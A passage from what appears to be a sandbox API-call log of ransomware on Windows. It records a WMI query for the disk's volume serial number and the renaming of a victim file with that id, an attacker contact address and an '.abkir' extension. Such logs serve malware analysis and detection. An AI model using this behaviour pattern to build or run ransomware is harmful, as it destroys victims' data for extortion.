[4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0171.028] WbemDefPath:IUnknown:AddRef (This=0x6030ef0) returned 0x3 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0xbe22e0) returned 0x0 [0171.028] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe22e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0171.028] WbemDefPath:IUnknown:Release (This=0xbe22e0) returned 0x3 [0171.028] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0171.028] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0171.028] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x2 [0171.028] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x1 [0171.028] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0171.028] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6030ef0) returned 0x0 [0171.028] WbemDefPath:IUnknown:AddRef (This=0x6030ef0) returned 0x3 [0171.028] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x2 [0171.028] WbemDefPath:IWbemPath:SetText (This=0x6030ef0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0171.028] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0171.028] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0171.028] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0171.028] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0171.028] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0171.029] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0171.029] IUnknown:Release (This=0xb51e34) returned 0x1 [0171.029] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x6023cc0) returned 0x0 [0171.029] WbemLocator:IUnknown:QueryInterface (in: This=0x6023cc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0171.029] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023cc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x60277b0) returned 0x0 [0171.029] WbemLocator:IUnknown:Release (This=0x6023cc0) returned 0x0 [0171.029] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x60277b0) returned 0x0 [0171.029] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0171.029] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0171.030] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0171.030] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0171.030] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0171.030] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0171.030] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0171.030] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0171.030] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0171.030] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0171.030] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0171.030] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0171.030] WbemLocator:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x60277b0) returned 0x0 [0171.030] WbemLocator:IUnknown:AddRef (This=0x60277b0) returned 0x3 [0171.030] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x2 [0171.030] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0171.030] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0171.030] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0171.030] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x60277c0) returned 0x0 [0171.030] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60277c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x603310c) returned 0x0 [0173.326] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5bd64) returned 0x0 [0173.326] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603310c, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0173.326] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0173.326] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5bd84) returned 0x0 [0173.326] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5bd64) returned 0x0 [0173.327] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603310c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0173.327] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0173.327] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0173.327] CoTaskMemFree (pv=0xbd4a08) [0173.327] WbemLocator:IUnknown:Release (This=0x60277c0) returned 0x0 [0173.327] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5bd84) returned 0x0 [0173.327] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0173.328] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0173.329] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0173.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0173.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0173.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5bce4) returned 0x0 [0173.329] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0173.329] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0173.329] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0173.329] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0173.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5bd6c) returned 0x0 [0173.330] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0173.330] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0173.330] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0173.330] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0173.330] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0173.330] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x603310c) returned 0x0 [0173.330] WbemLocator:IUnknown:AddRef (This=0x603310c) returned 0x4 [0173.330] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x3 [0173.330] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x2 [0173.330] SysStringLen (param_1=0x0) returned 0x0 [0173.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0173.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0173.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.330] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0173.330] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0173.330] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5bd84) returned 0x0 [0173.330] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0173.330] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0173.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0173.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.331] IWbemServices:GetObject (in: This=0x603310c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0174.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0174.282] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0174.282] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0174.282] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3776d40*=0, plFlavor=0x3776d44*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3776d40*=8, plFlavor=0x3776d44*=0) returned 0x0 [0174.282] SysStringByteLen (bstr="9C354B42") returned 0x10 [0174.282] SysStringByteLen (bstr="9C354B42") returned 0x10 [0174.282] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3776d40*=8, plFlavor=0x3776d44*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3776d40*=8, plFlavor=0x3776d44*=0) returned 0x0 [0174.282] SysStringByteLen (bstr="9C354B42") returned 0x10 [0174.282] SysStringByteLen (bstr="9C354B42") returned 0x10 [0174.282] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0x9b [0174.282] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xbe [0174.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0174.282] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x21b78a40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0174.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0174.282] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0174.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0174.283] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests", lpFilePart=0x0) returned 0x58 [0174.283] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\", lpFilePart=0x0) returned 0x59 [0174.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0175.293] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.294] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, 